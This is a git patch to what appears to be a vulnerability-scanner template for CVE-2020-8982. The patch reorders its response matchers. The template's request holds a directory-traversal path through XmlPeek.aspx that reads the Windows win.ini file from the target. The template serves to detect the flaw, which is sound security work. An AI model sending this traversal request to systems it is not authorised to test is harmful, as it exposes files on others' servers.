From fb4bed83693cc9ccf7d4b5770a5f7a55897b1549 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Jun 2022 08:39:11 +0530 Subject: [PATCH] Update CVE-2020-8982.yaml --- cves/2020/CVE-2020-8982.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml index b5838cfa5c..d80ddfab2a 100644 --- a/cves/2020/CVE-2020-8982.yaml +++ b/cves/2020/CVE-2020-8982.yaml @@ -21,17 +21,20 @@ requests: - method: GET path: - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" + matchers-condition: and matchers: - - type: status - status: - - 200 + - type: word + part: body words: - "bit app support" - "fonts" - "extensions" condition: and - part: body + + - type: status + status: + - 200 # Enhanced by mp on 2022/06/27